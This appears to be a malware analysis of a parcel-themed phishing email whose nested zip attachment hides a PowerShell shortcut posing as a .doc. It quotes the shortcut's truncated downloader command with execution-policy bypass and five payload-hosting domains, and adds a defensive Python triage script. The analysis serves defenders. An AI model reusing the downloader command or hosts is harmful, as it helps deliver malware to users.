Email scams – undelivered parcel

Timestamp – end of January 2017 (26/1/2017 12:06 PM)


Email info

  • Sender IP – 91.121.30.151
  • Sender Email – steven.coleman@sitedetest.eu
  • Subject – Parcel #8742826 shipment problem, please review

Attachment

Only Trend Micro assigns the attachment a specific family name, “TROJ_NEMUZIP.SMA1”; every other engine that flags it uses a generic detection for a PowerShell downloader script, such as “TR/LNK.PSH.Downloader.Gen”.

Attachment comments

The attachment is nested Matryoshka-style: an archive inside an archive, then a folder named like a document, then a shortcut with a double extension.

Undelivered-Parcel-ID-874826.zip -> Undelivered-Parcel-ID-874826.doc.zip -> Undelivered-Parcel-ID-874826.doc (folder) -> Undelivered-Parcel-ID-874826.doc.lnk = shortcut to powershell

Explorer never displays the .lnk extension, so the final file is shown to the user as Undelivered-Parcel-ID-874826.doc even with extension hiding turned off.


The nesting makes sense for AV evasion, but it works against the user actually executing the final file: it seems unlikely that a user would extract a double archive and then open a folder just to run what is inside. The more plausible path is that they extract nothing at all and simply keep double-clicking in the archive viewer until the shortcut is launched.

PowerShell parameters found in the shortcut (the command line is reproduced here as far as it was captured):

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; $ll = 'jb-sounddesign.de','www.sdo.ru','vitalmanage.com','www.poolcenterdessau.de','www.gifizsee.de'; $fn = $env:temp+$cs; $lk = $fn
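The nesting described above and the extraction of the shortcut's command line can be automated for triage. The following Python script is an added example, not code from the original post: it walks the zip-in-zip layout in memory without extracting anything to disk, parses the .lnk according to the MS-SHLLINK StringData layout to recover the relative path and command-line arguments, flags the double extension and the PowerShell indicators, and pulls the quoted hostnames out of the arguments. The archive and the shortcut are constructed inline as sample input; the shortcut's arguments are the page's truncated fragment verbatim, while the relative path to powershell.exe, the list of indicator strings and the cp1252 fallback for non-Unicode shortcuts are assumptions made for the example.

```python
import io
import re
import struct
import zipfile

# MS-SHLLINK ShellLinkHeader constants
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_DATA = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location")]

# The fragment quoted on the page (everything after powershell.exe); it stops where the page's copy stops.
SAMPLE_ARGS = ("-ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; "
               "$ll = 'jb-sounddesign.de','www.sdo.ru','vitalmanage.com',"
               "'www.poolcenterdessau.de','www.gifizsee.de'; $fn = $env:temp+$cs; $lk = $fn")

# Indicator strings (assumed list) that a shortcut posing as a document has no business carrying.
SUSPICIOUS = re.compile(r"powershell|-ExecutionPolicy\s+ByPass|-NoProfile|-command|"
                        r"DownloadFile|FromBase64String|\bIEX\b", re.I)
DOUBLE_EXT = re.compile(r"\.(doc|docx|pdf|xls|xlsx|jpg|png)\.lnk$", re.I)
QUOTED_HOST = re.compile(r"'([\w.-]+\.[a-z]{2,})'", re.I)


def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping the optional IDList
    and LinkInfo by their declared sizes. Raises ValueError if it is not a .lnk."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_DATA:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # count is in characters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:                                    # ANSI strings: code page assumed to be cp1252
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def build_lnk(relative_path, arguments):
    """Minimal Unicode .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS
    (constructed sample; real shortcuts usually also carry an IDList and LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + b"\x00" * (LNK_HEADER_SIZE - 24))   # attributes, timestamps, size etc. zeroed

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments) + struct.pack("<I", 0)  # TerminalBlock


def build_nested_zip():
    """zip -> zip -> folder -> .doc.lnk, mirroring the layout seen in the attachment."""
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_ARGS)
    inner, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("Undelivered-Parcel-ID-874826.doc/Undelivered-Parcel-ID-874826.doc.lnk", lnk)
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Undelivered-Parcel-ID-874826.doc.zip", inner.getvalue())
    return outer.getvalue()


def walk_archive(blob, path="", depth=0, max_depth=8):
    """Yield (virtual path, bytes) for every non-zip leaf, recursing into nested
    zips in memory; max_depth stops a chain of archives nested without end."""
    if depth > max_depth:
        raise ValueError("archive nested deeper than %d: %s" % (max_depth, path))
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            member = path + "/" + info.filename if path else info.filename
            content = z.read(info)
            if content.startswith(b"PK\x03\x04"):
                yield from walk_archive(content, member, depth + 1, max_depth)
            else:
                yield member, content


def triage(blob):
    """One finding per shell link found anywhere inside the (nested) archive."""
    findings = []
    for member, content in walk_archive(blob):
        try:
            fields = parse_lnk(content)
        except ValueError:
            continue
        cmd = fields.get("relative_path", "") + " " + fields.get("arguments", "")
        findings.append({
            "member": member,
            "double_extension": bool(DOUBLE_EXT.search(member)),
            "suspicious": bool(SUSPICIOUS.search(cmd)),
            "domains": sorted(set(QUOTED_HOST.findall(fields.get("arguments", "")))),
        })
    return findings


if __name__ == "__main__":
    for finding in triage(build_nested_zip()):
        print(finding)
```

Run against a real sample, replace build_nested_zip() with the bytes of the outer .zip; walk_archive never writes to disk, so the shortcut is never placed where a stray double-click could launch it, and the relative-path field is checked as well as the arguments because a shortcut can name powershell.exe in either.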

Domains listed

  • jb-sounddesign.de
  • www.sdo.ru
  • vitalmanage.com
  • www.poolcenterdessau.de
  • www.gifizsee.de

Post-execution observations: to be added.